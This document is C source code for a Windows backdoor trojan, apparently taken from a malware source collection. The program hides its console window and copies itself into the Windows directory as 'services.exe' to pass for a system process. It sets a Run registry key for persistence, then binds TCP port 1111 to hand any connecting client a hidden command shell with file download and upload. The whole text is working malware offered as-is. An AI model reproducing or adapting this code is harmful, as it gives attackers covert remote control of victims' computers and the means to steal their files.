|| Author: Nibble/EOF || Back to sources || View project folder ||
//includes
#include <windows.h>
#include <winsock.h>
#include <wininet.h>
#include <small.h>

#include "..\\Includes\\Includes.h"
#include "..\\Includes\\Small.h"

//consts
#define PORT 1111
#define SLEEP_TIME 500
#define szExit "exit\r\n"
#define szError "Some shit happend"

#define szRegshit "666"
#define szName    "\\services.exe"

#define szMtx   "-. .-"
//              |    |
//               \___/

//main function
int main()
{
 WSADATA wsa;
 struct sockaddr_in sin;
 struct sockaddr_in sa = {0};

 char szbuff[MAX_BUFF];
 char szFile[MAX_PATH];

 int a_sock,sock;

 SECURITY_ATTRIBUTES sec_att;
 STARTUPINFO startup_info;
 HANDLE hReadPip1,hReadPip2;
 HANDLE hWritePip1,hWritePip2;
 HKEY hKey;

 unsigned long dwBytesR;
 unsigned long ulWrite;

 unsigned int uSize;
 unsigned int uSend;
 unsigned int uMove;
 unsigned int uMode;
 unsigned int uByteS;

 int rsize;

 HANDLE hFile;

 //Hide Console window | CreateMutex because we only need one our running
 //process | Copy itself to win dir | Autorun shit |

  ShowWindow(FindWindow("ConsoleWindowClass",0),0);

  CreateMutex(0,FALSE, szMtx);

  if(GetLastError() == ERROR_ALREADY_EXISTS)
  {
   ExitProcess(0);
  }

  GetWindowsDirectory(szbuff,sizeof(szbuff));
  lstrcat(szbuff,szName);

  GetModuleFileName(GetModuleHandle(0),szFile,sizeof(szFile));
  
  if(RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey) == ERROR_SUCCESS)
  {
   RegSetValueEx(hKey,szRegshit,0,REG_SZ,szbuff,sizeof(szbuff));
   RegCloseKey(hKey);
  }

  if(lstrcmp(szbuff,szFile))
  {
   CopyFile(szFile,szbuff,FALSE);
   ShellExecute(0, "open",szbuff,0,0,SW_HIDE);
   ExitProcess(0);
  }

 //Initialize winsock library
  WSAStartup(0x101,&wsa);

  //Create socket
  a_sock = socket(AF_INET,SOCK_STREAM,0);

  //If cant create socket exit
  if(a_sock == 0)
  {
   return -1;
  }

  //fill structure 
  sin.sin_family = AF_INET; //TCP
  sin.sin_addr.s_addr = INADDR_ANY; //Accept any ip
  sin.sin_port = htons(PORT); //listen on this port

  //try to bind socket to port | error -> exit
  if(bind(a_sock,(SOCKADDR *)&sin,sizeof(sin)) != 0)
  {
   return -1;
  }

  //listen and accept only one connection | error -> exit
  if(listen(a_sock,1) != 0)
  {
   return -1;
  }

  //Loop forever
  while(1)
  {
   //Accept incoming connection
   sock = accept(a_sock,0,0);
   
   //error -> loop again
   if(sock == INVALID_SOCKET)continue;

   //fill structure
   sec_att.lpSecurityDescriptor = 0; // default security descriptor
   sec_att.bInheritHandle = TRUE; 
   sec_att.nLength = sizeof(SECURITY_ATTRIBUTES); // sizeof(SECURITY_ATTRIBUTES) struct

   //create the pipes for our command promp
   CreatePipe(&hReadPip1,&hWritePip1,&sec_att,0);
   CreatePipe(&hReadPip2,&hWritePip2,&sec_att,0);

   //The GetStartupInfo function retrieves the contents of the 
   //STARTUPINFO structure that was specified when the calling 
   //process was created.(MSDN)
   GetStartupInfo(&startup_info);

   //fill structure
   startup_info.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; //standard input/output
   startup_info.wShowWindow = SW_HIDE; //hide window
   startup_info.hStdOutput = startup_info.hStdError = hWritePip1; //hWritePip1 is handle for output
   startup_info.hStdInput = hReadPip2; //and hReadPip2 is handle for input

   //run cmd
   CreateProcess(0,"cmd.exe",0,0,TRUE,CREATE_NEW_CONSOLE,0,0,&startup_info,(PROCESS_INFORMATION*)&startup_info);

   //Loop forever again :)

   while(1)
   {
	Sleep(SLEEP_TIME); //Sleep

    //Check do we have something ?
    if(PeekNamedPipe(hReadPip1,&szbuff[1],MAX_BUFF,&dwBytesR,0,0) == 0)
	{
	 break;
	}

	if(dwBytesR) 
    {
	 //First char means something (download,upload,standard command)

	 szbuff[0] = DEFAULT_MARK;

     //read data from cmd.exe
     if(ReadFile(hReadPip1,&szbuff[1],dwBytesR,&dwBytesR,0) == 0)
	 {
	  break;
	 }
     
	 //send it to client
     if(send(sock,szbuff,dwBytesR+1,0) <= 0)
	 {
	  break;
	 }

	 dwBytesR = 0;
    }
    else
    {
	 //clear buff
 	 ZeroMemory(szbuff,MAX_BUFF);

	 //recive buffer
     dwBytesR=rsize=recv(sock,szbuff,MAX_BUFF-1,0);

	 //if some error happens break this loop
	 if(rsize <= 0)
	 {
	  break;
	 }
   
	 //does client send "exit" string
	 if(strncmp(&szbuff[1],szExit,lstrlen(szExit)) == 0)
	 {
	  break;
	 }
   
	 //add END_MARK on szbuff
	 lstrcat(szbuff,END_MARK);

	 //Check what client sends
	 switch(szbuff[0])
	 {
	 case DEFAULT_MARK:
		  //This means simple command
		  //Write it to cmd.exe
		  WriteFile(hWritePip2,&szbuff[1],dwBytesR,&dwBytesR,0);
		  break;

	 case DOWNLOAD_MARK:
          //Client wants to download something

		  //Remove END_MARK
		  szbuff[lstrlen(szbuff)-4] = '\0';
		  
		  //Open file for reading
		  hFile = CreateFile(&szbuff[lstrlen(DOWNLOAD)+2],GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
		  
		  //Can't open file
		  if(hFile == INVALID_HANDLE_VALUE)
		  {
		   //send(sock,szError,lstrlen(szError),0);
		   break;
		  }

		  //Get File size
		  uSize = GetFileSize(hFile,0);

		  //put that size into szbuff with specific mark at the beggining
		  wsprintf(szbuff,"%c%d",FILESIZE_MARK,uSize);

		  //send it to client
		  uByteS = send(sock,szbuff,lstrlen(szbuff),0);

		  //error -> break loop
		  if(uByteS <= 0)
		  {
		   break;
		  }

		  //put in szbuff download_mark char because client will know
		  //that is server sending file

		  szbuff[0] = DOWNLOAD_MARK;

		  //loop while uSize is positive number
		  while(uSize)
		  {
		   //Zero szbuff exept first char(DOWNLOAD_MARK)
		   ZeroMemory(&szbuff[1],MAX_BUFF-1);

		   uSend = MAX_BUFF-2;

		   //Do I need explain this ? blah
		   if(uSend>uSize)
		   {
		    uSend=uSize;
		   } 

		   //If uSize is smaller or equal to ZERO break
		   if((int)uSize <= 0)
		   {
		    break;
		   }

		   //uMove is holding position in file
		   uMove = 0-uSize;

		   //set position to uMove in file from end file
		   SetFilePointer(hFile,uMove,0,FILE_END);

		   //read that part from file and put it into szbuff
		   ReadFile(hFile,&szbuff[1],uSend,&uMode,0);

		   //send it to client
		   uByteS = send(sock,szbuff,uSend+1,0);

		   //error -> break
		   if(uByteS == SOCKET_ERROR)
		   {
		    break;
		   }

		   //Substract sended bytes from uSize
		   uSize = uSize - uSend;

		  }
       
		  //Close handle
		  CloseHandle(hFile);

		  break;

	 case UPLOAD_MARK:
          //Uploading file

		  //Open file for writing
		  hFile = CreateFile(szFile,GENERIC_WRITE,0,0,OPEN_ALWAYS,0,0);

		  //Can't create file
		  if(hFile == INVALID_HANDLE_VALUE) 
		  {
		   //send(sock,szError,lstrlen(szError),0);
		   break;
		  }

		  //While client doesn't send ENDF_MARK
		  while(szbuff[0] != ENDF_MARK)
		  {
		   //Set the pointer at end of file
		   SetFilePointer(hFile,0,0,FILE_END);

		   //Write szbuff to file
		   WriteFile(hFile,&szbuff[1],rsize-1,&ulWrite,0);

		   //Zero szbuff
		   ZeroMemory(szbuff,MAX_BUFF);
          
		   //receive buffer
           rsize=recv(sock,szbuff,MAX_BUFF-1,0);

		   //error break
		   if(rsize <= 0)
		   {
			break;
		   }
		  }

		  //Close Handle
		  CloseHandle(hFile);

	      break;

	 case FILESIZE_MARK:
		  //Convert file size into number
		  uSize = atoi(&szbuff[1]);
		  break;

	 case FILENAME_MARK:
          //get File name that client sends

		  //remove last 4 bytes
		  szbuff[lstrlen(szbuff)-4] = '\0';

		  //copy it to szFile
		  lstrcpy(szFile,&szbuff[1]);

		  //put upload mark into szbuff
		  szbuff[0] = UPLOAD_MARK;
		  szbuff[1] = '\0';

		  //send it to client
		  send(sock,szbuff,lstrlen(szbuff),0);

	      break;
	 }
    }
   }

   //write "exit" command to cmd.exe
   WriteFile(hWritePip2,szExit,lstrlen(szExit),&dwBytesR,0);

   //Close handles
   CloseHandle(hWritePip2);
   CloseHandle(hReadPip1);
   CloseHandle(hWritePip1);
   CloseHandle(hReadPip2);

   //Close socket
   closesocket(sock);

  }
  //Close socket
  closesocket(a_sock);
  closesocket(sock);
  WSACleanup();
  //Exit
 return 0;
}

//----------------LIBS----------------+
#pragma comment(lib,"wsock32.lib")
#pragma comment(lib,"wininet.lib")